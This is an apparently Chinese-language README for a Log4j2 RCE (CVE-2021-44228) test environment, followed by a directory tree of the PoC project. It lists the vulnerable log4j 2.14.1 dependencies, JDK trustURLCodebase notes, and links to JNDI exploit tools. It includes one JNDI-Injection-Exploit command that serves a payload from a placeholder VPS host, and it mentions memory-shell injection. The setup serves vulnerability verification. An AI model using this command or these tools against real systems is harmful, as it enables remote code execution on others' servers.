Apache Log4j2 RCE( CVE-2021-44228)验证环境# Apache Log4j2 RCE 验证环境
> Since from 2021.12.09
## Some Ref
https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg
## 搭建环境
maven引入相关包及存在漏洞版本范围
```xml
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-api</artifactId>
<version>2.14.1</version>
</dependency>
<dependency>
<groupId>org.apache.logging.log4j</groupId>
<artifactId>log4j-core</artifactId>
<version>2.14.1</version>
</dependency>
```

## 检查
#### 利用dnslog探测是否使用

#### ldap结合jndi利用RCE
jdk版本有关,JDK 11.0.1、8u191、7u201、6u211之后需要手动设置trustURLCodebase为true
> 关于此详细学习可参考 https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/
利用方式,可结合jndi注入工具,例如[JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit) 、[fastjson_rce_tool](https://github.com/wyzxxz/fastjson_rce_tool) 、 [JNDIExploit](https://github.com/feihong-cs/JNDIExploit)
> 还可结合工具实现多种已公开回显方式、内存马注入方式
```bash
#
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app" -A your_vps_ip
```

#### Web
> TODO

#### About
https://github.com/apache/logging-log4j2/tags
[4.0K] /data/pocs/a6133d09d13e413eb975d455500e56be78e67963
├── [4.0K] images
│ ├── [259K] 0.png
│ ├── [678K] 1.png
│ ├── [452K] 2.png
│ └── [445K] 3.png
├── [5.9K] Logdemo.iml
├── [2.8K] pom.xml
├── [1.4K] README.md
└── [4.0K] src
└── [4.0K] main
├── [4.0K] java
│ └── [4.0K] com
│ └── [4.0K] example
│ └── [4.0K] logdemo
│ ├── [2.1K] Log4j2Web.java
│ └── [ 420] Log4jTest.java
└── [4.0K] resources
├── [ 913] log4j2.xml
└── [4.0K] META-INF
└── [ 326] beans.xml
9 directories, 11 files